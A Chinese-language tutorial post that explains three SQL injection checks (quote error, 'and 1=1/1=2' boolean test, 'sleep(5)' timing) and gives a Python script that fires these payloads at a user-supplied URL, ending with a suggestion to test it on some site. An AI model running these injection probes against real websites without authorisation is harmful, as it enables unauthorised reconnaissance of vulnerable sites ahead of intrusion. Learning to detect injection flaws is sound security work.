Python-編寫一個mysql注入漏洞檢測工具

判斷mysql網站是否存在注入漏洞的幾個方法：

1. 注入點後加上一個單引號會報錯
2. and 1=1返回正常頁面，and 1=2返回的頁面不一樣於正常頁面
3. and sleep(3) 網頁會等待3秒左右

根據返回的頁面狀況咱們就能知道是否存在注入漏洞

要獲取頁面返回的結果是否是同樣的，咱們能夠經過獲取請求頭中的Content-Length的長度來判斷

知道這些後，咱們就能來寫個簡單的python腳本

# -*- coding:utf-8 -*-
__author__ = "MuT6 Sch01aR"

import requests
import argparse
import time

def argparse_option():
    parser = argparse.ArgumentParser(description='The Help of Mysql_Inject.py')
    parser.add_argument('-u','--url',help='The Url To Check')
    args = parser.parse_args()
    return args

def way_1(url):
    payload = [' and 1=1',' and 1=2']
    url_1 = url+payload[0]
    url_2 = url+payload[1]
    r = requests.get(url=url)
    r_1 = requests.get(url=url_1)
    r_2 = requests.get(url=url_2)
    h = r.headers.get('Content-Length')
    h_1 = r_1.headers.get('Content-Length')
    h_2 = r_2.headers.get('Content-Length')
    if h ==h_1 and h !=h_2:
        print("[*] %s can be injected" %url)
    else:
        way_2(url)

def way_2(url):
    payload = ' and sleep(5)'
    t1 = time.time()
    requests.get(url=url+payload)
    t2 = time.time()
    if t2-t1 >5:
        print("[*] %s can be injected" %url)
    else:
        way_3(url)

def way_3(url):
    payload = "'"
    url_1 = url+payload
    r = requests.get(url=url)
    r_1 = requests.get(url=url_1)
    h = r.headers.get('Content-Length')
    h_1 = r_1.headers.get('Content-Length')
    if h != h_1:
        print("[*] %s can be injected" % url)
    else:
        print("[!] %s can't be injected" %url)

if __name__ == '__main__':
    cmd_args = argparse_option()
    url = cmd_args.url
    if url:
        way_1(url)
    else:
        print("Usage:python3 main.py -u [url]")

找個站測試一下

這個腳本還只能檢測一些簡單的連接，多參數的還檢測不了